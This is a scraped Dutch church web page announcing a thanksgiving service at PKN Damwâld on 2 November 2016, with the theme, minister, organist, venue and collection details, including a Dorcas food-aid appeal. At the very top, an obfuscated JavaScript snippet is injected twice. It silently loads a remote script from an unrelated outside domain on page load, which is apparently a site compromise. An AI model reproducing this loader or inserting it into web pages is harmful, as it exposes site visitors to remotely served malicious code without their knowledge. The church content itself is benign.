;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Dankstond Gereformeerd Damwâld - PKN Damwâld
woensdag 2 november 2016
19:30 uur

Dankstond Gereformeerd Damwâld

Thema: “Looft God die voedsel geeft” (Ps. 147:7-11)

vg_-01

Informatie

Voorganger:Ds. S. Boukes
Organist:Tim van der Weide
Thema:“Looft God die voedsel geeft” (Ps. 147:7-11)
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Eerste collecte: Dorcas voedselactie 2016

Dit jaar organiseert Dorcas voor de éénentwintigste keer de Dorcas Voedselactie: een actieweek waarin duizenden mensen zich vrijwillig inzetten voor voedsel en voedselzekerheid voor de allerarmsten in Oost-Europa en Afrika. De Dorcas Voedselactie vindt plaats rondom de Dankdag voor gewas en arbeid. Dorcas ziet Dankdag als een uitgelezen moment om stil te staan bij onze niet vanzelfsprekende welvaart en om onze dankbaarheid te tonen door om te zien naar de allerarmsten in de wereld. Dit staat ook in missietekst van Dorcas, Mattheüs 25:31-46.

Tweede collecte: Kerk
Uitganscollecte: Onderhoud en inventaris